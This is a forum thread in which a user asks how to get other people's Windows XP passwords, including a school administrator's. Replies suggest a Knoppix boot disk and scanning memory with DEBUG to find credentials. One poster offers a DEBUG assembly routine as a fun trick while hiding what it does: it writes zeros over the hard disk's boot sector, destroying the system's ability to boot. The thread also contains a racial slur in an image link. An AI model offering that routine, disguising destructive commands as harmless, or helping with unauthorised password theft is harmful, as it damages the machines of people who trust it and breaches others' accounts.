Windows Password

General chit chat, chin wag, abuse, etc.
Post Reply
pelmeen
Regular
Posts: 50
Joined: Thu May 19, 2005 4:19 pm

Post by pelmeen »

2 things

1) i am using windows xp...and i am adminitrator
and here are 2 users
one is mine and one isnt mine
can i find that not mine password
like from some file or smthing

2) i went to school computer and there are lots of users
i have my class user but dont have privilegs..so i cant do many things
is there a way to find administrator password or someone's?
Slayer
<3 bd long time
Posts: 947
Joined: Thu Mar 17, 2005 9:08 pm

Post by Slayer »

Try a floppydisk with knoppix.
<img src='http://i9.tinypic.com/2vs292h.jpg' border='0' alt='user posted image' />
Ice-T
Loyal fan
Posts: 262
Joined: Sat Oct 18, 2003 8:51 am
Location: nowere

Post by Ice-T »

if the person has recently loged in, there is a way to do it in debug
start->>run "debug"
<3 the way XP doesnt clear ur ram :P
<img src='http://www.prism.gatech.edu/~gtg818f/basesig.gif' border='0' alt='user posted image' /><br><img src='http://img228.imageshack.us/img228/439/steam1tf.gif' border='0' alt='user posted image' />
pelmeen
Regular
Posts: 50
Joined: Thu May 19, 2005 4:19 pm

Post by pelmeen »

well i tried the debug but it gives me this:
<a href='http://www.zone.ee/igaasi/debug.JPG' target='_blank'>http://www.zone.ee/igaasi/debug.JPG</a>

and knopix...does it have to be 500 MB? :D
wen it doesnt plz link :)
Slayer
&lt;3 bd long time
Posts: 947
Joined: Thu Mar 17, 2005 9:08 pm

Post by Slayer »

pelmeen wrote: well i tried the debug but it gives me this:
<a href='http://www.zone.ee/igaasi/debug.JPG' target='_blank'>http://www.zone.ee/igaasi/debug.JPG</a>

and knopix...does it have to be 500 MB? :D
wen it doesnt plz link :)
You might need to give debug a command :0
<img src='http://i9.tinypic.com/2vs292h.jpg' border='0' alt='user posted image' />
pelmeen
Regular
Posts: 50
Joined: Thu May 19, 2005 4:19 pm

Post by pelmeen »

and what would that be?
Ice-T
Loyal fan
Posts: 262
Joined: Sat Oct 18, 2003 8:51 am
Location: nowere

Post by Ice-T »

try "d"
d = dump
win xp stuff is stored in all memory below 100
so d = 100 would show you
100
101
102
etc
u just gotta find the mem addy for the username then the password shouldl be stored near it then u get the fun of dicipering its encryption
u can also write masm programs directly in to it and execute them

heres one evryone can try :D

debug <enter>
-F 200 L1000 0 <enter>
-A CS:100 <enter>
xxxx:0100 MOV AX,301 <enter>
xxxx:0103 MOV BX,200 <enter>
xxxx:0106 MOV CX,1 <enter>
xxxx:0109 MOV DX,80 <enter>

xxxx:010C INT 13 <enter>
xxxx:010E INT 20 <enter>
xxxx:0110 <enter>
-g

-q

btw u should only try this in to debug if u happen to have an IQ of below 10 :ph34r:
<img src='http://www.prism.gatech.edu/~gtg818f/basesig.gif' border='0' alt='user posted image' /><br><img src='http://img228.imageshack.us/img228/439/steam1tf.gif' border='0' alt='user posted image' />
hummmu
Member
Posts: 165
Joined: Sun Dec 12, 2004 7:59 pm

Post by hummmu »

What does it do?
<a href='http://www.hb2k4.tk' target='_blank'><span style='color:blue'> Use do not abuse.</span> </a> <br><br>-MySeLF-
Ice-T
Loyal fan
Posts: 262
Joined: Sat Oct 18, 2003 8:51 am
Location: nowere

Post by Ice-T »

thats for me to know, and you to find out.......

then sumthing for me to laugh about :rolleyes:
<img src='http://www.prism.gatech.edu/~gtg818f/basesig.gif' border='0' alt='user posted image' /><br><img src='http://img228.imageshack.us/img228/439/steam1tf.gif' border='0' alt='user posted image' />
delinquent
&lt;3 bd long time
Posts: 869
Joined: Fri Nov 14, 2003 12:08 am
Location: binarys underpants
Contact:

Post by delinquent »

Yeah.. don't do it for you morons out there
<img src='http://deli.lazyslacker.com/stupidnigga.jpg' border='0' alt='user posted image' /><br><a href='http://deli.lazyslacker.com' target='_blank'>http://deli.lazyslacker.com</a><br>Don't ban me, ban the idiot!
pelmeen
Regular
Posts: 50
Joined: Thu May 19, 2005 4:19 pm

Post by pelmeen »

grr what really i have to write in debug?
Post Reply